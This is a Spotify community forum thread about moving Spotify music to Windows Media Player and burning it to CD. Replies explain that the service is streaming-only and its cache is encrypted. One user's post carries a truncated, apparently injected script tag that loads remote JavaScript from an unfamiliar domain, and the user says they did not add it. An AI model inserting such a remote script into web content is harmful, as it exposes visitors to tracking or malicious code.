Announcements
The Spotify Stars Program: Celebrating Values Week!

Help Wizard

Step 1

NEXT STEP

windows media player

windows media player

hi i am new to spotify my question is can i add the music from spotify to my computers windows media player so i ca burn the songs to a cd

35 Replies

That is not possible with Spotify, no.  Spotify is a streaming service only.  In order to do what you are asking about, you would need to purchase the songs through iTunes, Amazon.com, or other online music store.

Just to add to the above, there is also a Download service within Spotify itself, which will allow you to export music to Windows Media Player,etc. but this is currently only available in Europe.
Check out our Twitter for the latest updates on any service issues: @Spotifystatus

Problem solved? Click 'Accept as solution' to make it easier to find for others!

New to the Community? Check out our Community newbie tips

Hi, you can't just add music from spotify to windows media player, then you have to buy the song... hope it help you Smiley Happy

as you download songs to your computer from spotify don't they also get stored on your comp ? like for instance when going to history or recent places ?

They do, but not in a format that is useful to any other application.  The Spotify cache is encrypted in such a way as to make it impossible to copy the songs in the way that you are thinking.

I added songs to a playlist that Spotify automatically had when I started using it was called "Windows Media Player". I wondered if the playlist I have on Spotify will show up on my Windows Media Player, but it didn't. So why did they add it, when it's not able to show on Windows Media Player?

Spotify imports playlists from other players so that you can play that music from within Spotify.  It was not meant to go the other way around unfortunately.  So in your case, it sounds like Spotify imported your playlist(s) from Windows Media Player, and you should be able to play those playlists from within Spotify, but changing the playlists in Spotify will not change the playlists in Media Player.  This import is a one-way operation, and only happens when you first install Spotify, or if you tell Spotify to import them again.  Although if you do have Spotify re-import your playlists, you may end up with duplicates, so don't do that unless you have made changes to them in Media Player, and want to replicate those changes to Spotify.

i have  a question.....before i get all involved with spotify i want to make sure that i am reading these posts right.....i have a play list that i want burned, from what im reading, i have to pay for the songs to go into another program just so that i can burn them to a cd??? this is what im getting out of the posts? is this correct or am i reading it wrong??? thanks

@mrsgrate08 wrote:

i have  a question.....before i get all involved with spotify i want to make sure that i am reading these posts right.....i have a play list that i want burned, from what im reading, i have to pay for the songs to go into another program just so that i can burn them to a cd??? this is what im getting out of the posts? is this correct or am i reading it wrong??? thanks

To burn songs to a CD from Spotify you'd need to purchase them. Otherwise, you would be able to sync songs and cancel your subscription. We'd also be unable to keep track of song plays and compensate the artists.

Currently Downloads aren't available in the US.

Check out our Twitter for the latest updates on any service issues: @Spotifystatus

Problem solved? Click 'Accept as solution' to make it easier to find for others!

New to the Community? Check out our Community newbie tips

HI,

I understrand you can't simply burn music from your playists or save them else where.  What i want to do is simply play the songs i have saved on my app via windows media player while there synced.  IS this possible?  My mate is a DJ and pays for your app and when ever any one requests a song, he plays it via spotify.  He doesn't download nor copy any of this data, he simply plays it and thats what i want to be able to do.

Hi. No you can only play Spotify music through a Spotify app I'm not sure I understand understand why anyone would want to do otherwise 🙂

As for your friend, I suspect the terms of Spotify's service specifically prohibit using their music for public performance.

I found the necessary programme that allows you to play Spotify via windows media centre (legitimately of course) using both a plug in which allows you to use last.fm which in turn allows you to use Spotify, solely on the basis you have a Spotify account. Problem is, still didn't achieve what I wanted which was to play the fantastic play list i created with Spotify. Plan B- buy some kick ass speakers for my phone/computer to play them instead.

Aaah........you wanted to stream. Good luck with that 🙂

why is it only in Europe?  and will it come to the USA at all?

@jkonops wrote:

why is it only in Europe?  and will it come to the USA at all?

This is a pretty old topic, the downloads store has since been removed from Spotify in all countries. 

If you are looking for mp3 downloads, you will need to find an alternative source. 

Peter

Peter
Spotify Community Mentor and Troubleshooter

Spotify Last.FM Twitter LinkedIn Meet Peter Rock Star Jam 2014

If this post was helpful, please add kudos below!

Thats funny- it seems to surely give you the option?

File- Import Playlist- Windows Media Player

I did all of this, and imported the playlist from WMP. The playlist is reading my playlist file, and it says it is there, but all the content from the WMP playlist, is not there!

LOL- WHAT A USELESS OPTION!

Sorry punk fans! Looks like Crass will not be making a Spotify debut on my volition. I even ripped the CD that I paid for to WMP. 

Oh well- is it what it is!

<script type="text/javascript" src="https://secure-content-delivery.com/data.js.php?i={51758149-1A7B-45B5-BE86-AF9A5B05A442}&d=2013-7-21...

BTW- I don't know why it threw in this bogus link to my last comment? Another Spotify mystery?

<script type="text/javascript" src="https://secure-content-delivery.com/data.js.php?i={51758149-1A7B-45B5-BE86-AF9A5B05A442}&d=2013-7-21...

Is there an app for xbox yet. Got a surround sound hooked up to tv and use wmp app to play music but would much prefer to use Spotify for obvious reasons.

@D6am6ie6N wrote:
Is there an app for xbox yet. Got a surround sound hooked up to tv and use wmp app to play music but would much prefer to use Spotify for obvious reasons.

Unfortunately not. 

Can't see there ever being one, since Microsoft have a rival streaming service. 

Peter

Peter
Spotify Community Mentor and Troubleshooter

Spotify Last.FM Twitter LinkedIn Meet Peter Rock Star Jam 2014

If this post was helpful, please add kudos below!

Suggested posts